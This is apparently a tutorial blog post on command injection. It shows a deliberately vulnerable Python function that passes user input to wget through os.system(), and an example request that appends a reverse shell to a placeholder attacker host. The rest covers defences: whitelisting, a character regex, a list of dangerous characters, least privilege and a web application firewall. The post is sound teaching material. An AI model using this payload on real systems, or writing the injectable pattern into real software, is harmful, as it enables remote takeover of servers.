Learn about Command Injection attacks

Remote code execution is a type of vulnerability that occurs when attackers can execute their code on your machine. One of the most common ways it can happen is through command injection vulnerabilities. They are a type of remote code execution that occurs when user input is directly appended to a system command.

Learn about Command Injection attacks

In the previous post, I showed how exploit Command Injection bug. In this article, we will take a deeper look at the Command Injection vulnerability.

Assume that your website has functionality that allows users to download a remote file and view it on the site. Your application will use the system command to download the remote file.

Here is the python source code of that function. The os.system() function executes its input string as a system command.

import os
def download(url):
  os.system(“wget -O- {}”.format(url))
display(download(user_input.url))

Wget is a tool that downloads files by providing a URL and the -O- option that allows Wget to download the file and display it in standard output. So this program takes a URL from user input and passes it to the Wget command which is executed using os.system(). For example, if you submit this request, the app will download the source code of the Google homepage and show it to you.

GET /download?url=google.com
Host: example.com

In this case, the system command becomes:

wget -O- google.com

In the Linux command line, the semicolon “;” can be used to separate individual commands. An attacker can execute arbitrary commands after the Wget command by sending any command they want after a semicolon “;”. This input will cause the application to generate a reverse shell connect to the attacker’s IP on port 8080.

GET /download?url=”google.com;bash -i >& /dev/tcp/attacker_ip/8080 0>&1"
Host: example.com

In this case, the system command becomes:

wget -O- google.com;bash -i >& /dev/tcp/attacker_ip/8080 0>&1

The reverse shell makes the target server communicate with the attacker’s machine and establishes a remotely accessible user interface that allows the attacker to execute any system command.

Prevent Command Injections

As you can see, command injection can help an attacker completely infiltrate your application and the user account running the web server. So how can these dangerous vulnerabilities be prevented?

First, you can prevent command injection by not running system commands with user-supplied input. If you need to use user input in system commands, avoid calling operating system commands directly. Instead, you can try using built-in library functions that serve the same purpose. For example, instead of using os.system(“mkdir /dir_name”)you can use os.mkdir(“/dir_name”) in python’s OS library. And since user input can be converted into code that is parsed by the application, you should treat user-uploaded files as untrusted and protect the integrity of system files executed. , parsed or included by programs.

Alternatively, you can implement input validation for input passed into commands. The best way to do this is through a whitelist. You can whitelist strings or whitelist allowed characters. For example, when you want the user to be able to execute arbitrary commands, you can whitelist commands the user is allowed to run, such as ls and pwd, and only allow those input strings .

When you can’t do that, you can also whitelist the allowed characters. For example, this regular expression only allows lowercase letters and numbers and does not allow any special characters that can be used to manipulate the logic of the command. The length of the input string is also being limited to 1–10 characters.

^[a-z0–9]{1,10}$

Finally, you can also remove characters inserted into operating system commands. For example, some dangerous characters that should be removed include:

& | ; $ > < ` \ !

But this is often less effective because attackers are constantly coming up with innovative methods to bypass blacklist-based input validation.

If all else fails and an attacker manages to inject commands into your machine, how can you mitigate the harm they can cause? Running arbitrary commands on a system means having almost full access to that application’s permissions. So if you limit what your application can do on your system, a single injection by that application will not be able to cause serious harm to your system.

The “Least Privilege Principle” states that applications and processes should only be granted the privileges necessary to complete their tasks. It is a best practice that reduces the risk of entering the system during an attack because attackers will not have access to sensitive files and activities even if they are able to infiltrate users or processes. have low privileges. For example, when a web application only requests read access to a file, it will not be granted any write or execute permissions. Because if an attacker hijacks an application with high privileges, the attacker can gain its permissions. In this case, you should limit the privileges of the user running the web server so that attackers cannot use it to infiltrate the entire system.

Finally, you should update patches to prevent your application’s dependencies from creating command injection vulnerabilities. And you can also implement a web application firewall (WAF) to block suspicious attacks.